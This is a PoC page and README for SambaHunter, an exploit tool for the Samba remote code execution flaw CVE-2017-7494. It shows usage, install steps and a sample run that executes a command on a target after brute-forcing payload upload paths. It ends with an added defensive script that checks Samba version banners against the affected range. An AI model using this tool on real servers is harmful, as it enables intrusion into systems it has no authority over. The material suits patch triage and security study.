CVE-2017-7494 PoC — Samba Security Vulnerability

Associated Vulnerability
Title: Samba Security Vulnerability (CVE-2017-7494)
Description: Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution, allowing a malicious client to upload a shared library to a writable share and then cause the server to load and execute it.
Description
It is a simple script to exploit RCE for Samba (CVE-2017-7494).
Readme
# SambaHunter
It is a simple script to exploit RCE for Samba (CVE-2017-7494).

Now works with Python3. Many of the required Python2 libraries are deprecated (e.g. `commands`).

Added logging to show which shares are writeable. If 'Exploit Finished' appears but no shares are writeable, the exploit didn't work.

# Requirements
* sudo apt-get install smbclient
* pip install pysmbclient

# Usage
```
# python3 sambahunter.py -h


  ____                  _           _   _             _            
 / ___|  __ _ _ __ ___ | |__   __ _| | | |_   _ _ __ | |_ ___ _ __ 
 \___ \ / _` | '_ ` _ \| '_ \ / _` | |_| | | | | '_ \| __/ _ \ '__|
  ___) | (_| | | | | | | |_) | (_| |  _  | |_| | | | | ||  __/ |   
 |____/ \__,_|_| |_| |_|_.__/ \__,_|_| |_|\__,_|_| |_|\__\___|_|   
                                                                   
    # Exploit Author: avfisher (https://github.com/brianwrf)
    # Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 Remote Code Execution
    # CVE-2017-7494
    # Help: python sambahunter.py -h

usage: sambahunter.py [-h] [-s SERVER] [-c COMMAND]

optional arguments:
  -h, --help            show this help message and exit
  -s SERVER, --server SERVER
                        Server to target
  -c COMMAND, --command COMMAND
                        Command to execute on target server
```

# Example
```
 # python3 sambahunter.py -s 192.168.1.106 -c 'uname -a > /tmp/u.txt'


  ____                  _           _   _             _            
 / ___|  __ _ _ __ ___ | |__   __ _| | | |_   _ _ __ | |_ ___ _ __ 
 \___ \ / _` | '_ ` _ \| '_ \ / _` | |_| | | | | '_ \| __/ _ \ '__|
  ___) | (_| | | | | | | |_) | (_| |  _  | |_| | | | | ||  __/ |   
 |____/ \__,_|_| |_| |_|_.__/ \__,_|_| |_|\__,_|_| |_|\__\___|_|   
                                                                   
    # Exploit Author: avfisher (https://github.com/brianwrf)
    # Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 Remote Code Execution
    # CVE-2017-7494
    # Help: python sambahunter.py -h

[*] Exploiting RCE for Samba (CVE-2017-7494 )...
[*] Server: 192.168.1.106
[*] Samba version: Samba 4.3.8-Ubuntu
[*] Generate payload succeed: /root/samba_14506.so
[+] Brute force exploit: /volume1/samba_14506.so
[+] Brute force exploit: /volume2/samba_14506.so
[+] Brute force exploit: /volume3/samba_14506.so
[+] Brute force exploit: /shared/samba_14506.so
[+] Brute force exploit: /mnt/samba_14506.so
[+] Brute force exploit: /mnt/usb/samba_14506.so
[+] Brute force exploit: /media/samba_14506.so
[+] Brute force exploit: /mnt/media/samba_14506.so
[+] Brute force exploit: /var/samba/samba_14506.so
[+] Brute force exploit: /tmp/samba_14506.so
[+] Brute force exploit: /home/samba_14506.so
[+] Brute force exploit: /home/shared/samba_14506.so
[*] Exploit finished!
```
![](https://raw.githubusercontent.com/brianwrf/SambaHunter/master/example.jpeg)
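
For triage, the affected range in the vulnerability description above can be checked against a reported Samba version string, such as the `Samba 4.3.8-Ubuntu` banner in the example output. This is an added example, not part of SambaHunter; the function name `classify`, its status labels, and the treatment of vendor-suffixed versions as needing a package-level check are assumptions.

```python
import re

# Fixed upstream releases per branch, from the CVE description above.
FIXED_PATCH = {(4, 6): 4, (4, 5): 10, (4, 4): 14}
FIRST_AFFECTED = (3, 5, 0)

# x.y.z plus an optional vendor suffix such as "-Ubuntu" or "+dfsg".
_VERSION = re.compile(r"(\d+)\.(\d+)\.(\d+)([-+~]\S+)?")


def classify(banner):
    """Return one of: 'unparsed', 'not-affected', 'affected', 'verify-package'."""
    m = _VERSION.search(banner)
    if not m:
        return "unparsed"
    major, minor, patch = (int(g) for g in m.group(1, 2, 3))
    vendor_suffix = m.group(4)

    if (major, minor, patch) < FIRST_AFFECTED:
        return "not-affected"
    branch = (major, minor)
    if branch in FIXED_PATCH:
        in_range = patch < FIXED_PATCH[branch]
    else:
        # Branches newer than 4.6 postdate the fix; branches older than 4.4
        # have no fixed release listed, so every upstream build is in range.
        in_range = branch < (4, 4)
    if not in_range:
        return "not-affected"
    # Assumption: a vendor suffix means a distribution build, which may carry
    # a backported fix, so the package changelog decides, not the number.
    return "verify-package" if vendor_suffix else "affected"


if __name__ == "__main__":
    # Constructed sample banners; the first is the one in the example output.
    for sample in ("Samba 4.3.8-Ubuntu", "Samba 4.5.9", "Samba 4.6.4",
                   "Samba 3.4.17", "Samba 4.7.0", "unknown"):
        print(f"{sample:22} {classify(sample)}")
```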